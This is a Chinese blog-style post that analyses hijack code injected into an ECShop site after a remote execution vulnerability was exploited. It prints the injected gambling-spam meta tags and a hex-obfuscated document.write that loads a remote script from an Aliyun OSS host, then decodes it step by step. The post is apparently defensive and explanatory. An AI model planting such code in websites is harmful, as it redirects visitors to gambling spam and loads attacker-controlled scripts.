最近ecshop的远程执行漏洞闹得很凶,处理这个问题的时候发现一个很有意思的劫持代码
<meta property="qc:admins" content="4201266257651135546375" /><meta property="wb:webmaster" content="05cb73c74424929b" /><title>重庆幸运农场官方投注平台_重庆幸运农场投注平台【官方授权入口】</title><meta name="keywords" content="重庆幸运农场,重庆幸运农场投注,重庆幸运农场平台,重庆幸运农场官方" /><meta name="description" content="重庆幸运农场官方投注平台【95588K.com】时时精准提供重庆福彩公司详尽研究分析总结,重庆幸运农场开奖视频,重庆幸运农场结果分析,重庆幸运农场网上投注,重庆幸运农场过往各开奖记录,重庆幸运农场开奖结果,网上开户,专业的开奖视频直播资讯网"/><script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="{$page_title}"}</script><script type="text/javascript"> window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"] ('\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x66\x73\x66\x64\x73\x66\x2e\x6f\x73\x73\x2d\x63\x6e\x2d\x68\x6f\x6e\x67\x6b\x6f\x6e\x67\x2e\x61\x6c\x69\x79\x75\x6e\x63\x73\x2e\x63\x6f\x6d\x2f\x39\x35\x35\x38\x38\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e'); </script>
这个代码的作用就是当你以前打开过这个网站,那么网站标题还是显示原来网站的$page_title
当你是新访客,则直接跳转到]www.95588K.com
并且啊,搜索引擎收录的也是这个恶意title
比较隐蔽,一开始都没发现,后面有人反应这个问题,才察觉。
加密部分解密下
"\x64\x6f\x63\x75\x6d\x65\x6e\x74"
解密为
"document"
"\x77\x72\x69\x74\x65"
解密为
"write"
'\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x66\x73\x66\x64\x73\x66\x2e\x6f\x73\x73\x2d\x63\x6e\x2d\x68\x6f\x6e\x67\x6b\x6f\x6e\x67\x2e\x61\x6c\x69\x79\x75\x6e\x63\x73\x2e\x63\x6f\x6d\x2f\x39\x35\x35\x38\x38\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e'
解密为
'<script type="text/javascript" src="https://sfsfdsf.oss-cn-hongkong.aliyuncs.com/95588.js"></script>'
整段代码就是
<script type="text/javascript"> window["document"]["write"] ('<script type="text/javascript" src="https://sfsfdsf.oss-cn-hongkong.aliyuncs.com/95588.js"></script>'); </script>